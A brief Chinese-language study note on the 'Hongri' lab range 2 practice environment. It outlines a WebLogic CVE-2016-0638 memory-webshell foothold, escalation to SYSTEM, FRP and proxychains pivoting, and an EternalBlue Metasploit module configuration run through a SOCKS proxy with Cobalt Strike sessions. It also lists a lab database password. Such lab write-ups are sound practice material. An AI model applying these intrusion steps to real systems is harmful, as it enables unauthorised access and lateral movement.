红日靶场二-学习笔记

https://pan.baidu.com/s/1DtOdje33JeoF8kcU6LBqSw?pwd=g5r4

dc 区段1

pc 区段2 区段1

web nat 区段1

外网

ms17010 是打不通的

有服务要手动起来，，，，

mssql 1qaz@WSX

登录启动 weblogic

疑似存在漏洞

存在cve20160638

直接注入内存马

使用哥斯拉连接成功

我们现在是低权

靶机里面有360，但是cs直接生成的检测不出来。（搞了半天免杀还失败了【晕】

尝试提权，获取到了 system

ipconfig /displaydns

查看dns缓存

pc icmp探测是不行的，dns才能探测到

上传运行 frp（过程略）

端口扫描 可以用插件或者

proxychains nmap -A -F -sT -Pn 10.10.10.10

第二层上线cs

17010打进去用frp代理

set Proxies socks5:127.0.0.1:60000
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.10.10.10
set lport 4444
run

现在跳板机上面监听端口，

配置一个端口就可以，

生成shell，监听跳板机监听的端口，cs会自动转发流量

通过上面msf 获取的system，我们直接木马即可

cs 会同步 上线